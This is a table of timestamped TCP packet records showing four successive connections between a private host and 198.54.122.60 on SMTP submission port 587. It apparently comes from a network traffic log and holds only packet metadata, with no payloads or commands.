Jan 27, 2021 19:30:35.260173082 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.263757944 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.264168978 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.264484882 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.265201092 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.271832943 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.457427025 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.457623959 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.457753897 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.457847118 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.464638948 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.464797974 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.650352955 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.650434017 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.650753975 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.650818110 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.657495975 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.657529116 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.657556057 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.657599926 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.845649004 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.845823050 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.846086979 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.846165895 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.852641106 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.852667093 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.852720976 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.852766037 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.038702011 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.038817883 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.038973093 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.038980007 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.039036036 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.039052963 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.039150953 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.039231062 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.045536995 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.045561075 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.045614958 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.045687914 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.045691967 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.045804024 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.046396971 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.234038115 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.234564066 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.234592915 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.234616995 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.234659910 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.234694004 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.235177040 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.240082979 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.240716934 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.240753889 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.241147041 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.241234064 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.241261005 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.241374016 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:36.427977085 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.433952093 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.434016943 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.444909096 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:36.659759045 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:41.934422016 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:42.127408981 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:42.127804995 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:42.127834082 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:42.128025055 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:42.129184961 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:42.231666088 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:42.321935892 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:42.436172962 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:42.436290026 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:42.642733097 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:42.643021107 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:42.847095013 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:42.847354889 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:42.847765923 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:43.051781893 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.052468061 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:43.258687973 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.258749008 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.259048939 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:43.261142969 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:43.307912111 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:43.465235949 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.465456009 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.512017012 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.513207912 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.514065981 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:43.718060017 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.719253063 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.720436096 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:43.926702023 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.929501057 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:43.930145979 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.134196043 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.136909008 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.137712002 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.341730118 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.368963003 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.369486094 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.576004982 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.577131987 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.578144073 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.578664064 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.578938961 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.579226017 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.587192059 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.782277107 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.782582998 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.782614946 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.782808065 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.783068895 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.783160925 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.791480064 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.791750908 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.986622095 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.986778021 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.987066984 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.987128973 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:44.995738029 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:44.995866060 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.192998886 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.193053961 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.193173885 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.201478004 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.201507092 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.201586008 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.202100039 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.202172041 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.399004936 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.399107933 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.399213076 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.399213076 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.399262905 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.399349928 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.399418116 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.405925035 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.405945063 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.405951977 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.405958891 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.406127930 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.406156063 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.406229019 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.407392025 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.603234053 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.603252888 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.603315115 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.603327990 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.603389025 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.603449106 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.603471041 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.604008913 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.610287905 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.610306025 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.610313892 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.610652924 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.610771894 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.610860109 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.610958099 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:45.611279011 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.611315966 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.611399889 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.611433983 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.611557961 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.611598015 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.611608028 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.807673931 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.808005095 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.808103085 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.808134079 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.814538956 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.814577103 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.814594030 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.814666033 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.814719915 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:45.831526041 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:46.036075115 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:52.064127922 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:52.268287897 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:52.268827915 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:52.268971920 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:52.269088984 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:52.269787073 CET	49173	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:52.364209890 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:52.473784924 CET	587	49173	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:52.568958044 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:52.569154024 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:52.774681091 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:52.775216103 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:52.979537010 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:52.979588985 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:52.980285883 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:53.184436083 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.185285091 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:53.389486074 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.389609098 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.389903069 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.389995098 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:53.392060995 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:53.400342941 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:53.596383095 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.596486092 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.604650974 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.606028080 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.606955051 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:53.811284065 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.812047005 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:53.813079119 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.019607067 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.022588968 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.023437977 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.227735043 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.231112957 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.231829882 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.438888073 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.467226028 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.467693090 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.672045946 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.673204899 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.674361944 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.674810886 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.675137043 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.675580025 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.681675911 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.878998995 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.879025936 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.879168034 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.879193068 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.879575968 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.879656076 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:54.885947943 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:54.886122942 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.083465099 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.083677053 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.083758116 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.083851099 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.090295076 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.090441942 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.290062904 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.290112019 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.290360928 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.290453911 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.296531916 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.296703100 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.496040106 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.496062040 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.496069908 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.496288061 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.500833035 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.500855923 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.500894070 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.500986099 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.501090050 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.501782894 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.701895952 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.701920986 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.701961040 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.702090025 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.702366114 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.702446938 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.702461958 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.702475071 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.702759981 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.706636906 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.706655025 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.706672907 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.706685066 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.706795931 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.707065105 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.707190037 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.707303047 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.707422972 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:55.908926010 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.909415007 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.910172939 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.910196066 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.910203934 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.913132906 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.913309097 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:55.926386118 CET	587	49174	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:56.130260944 CET	49174	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:58.853790045 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:59.047341108 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:59.047450066 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:59.243333101 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:59.243845940 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:59.437158108 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:59.437447071 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:59.438045025 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:59.631119013 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:59.632096052 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:59.827064037 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:59.827284098 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:59.827297926 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:59.827491999 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:59.830619097 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:59.840423107 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:00.026079893 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.026103020 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.035975933 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.037259102 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.038275003 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:00.231355906 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.232912064 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.234016895 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:00.426873922 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.429558992 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.430330992 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:00.623224020 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.626065969 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.626909018 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:00.820059061 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.845009089 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:00.845809937 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.038916111 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.040956974 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.041462898 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.041593075 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.046185970 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.046448946 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.049753904 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.324729919 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.324857950 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.324881077 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.324909925 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.324939966 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.324984074 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.519191027 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.519421101 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.519465923 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.519473076 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.519566059 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.519587040 CET	49175	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:31:01.712543011 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.712605953 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.712624073 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.712652922 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.712785959 CET	587	49175	198.54.122.60	192.168.2.22
Jan 27, 2021 19:31:01.712905884 CET	49175	587	192.168.2.22	198.54.122.60
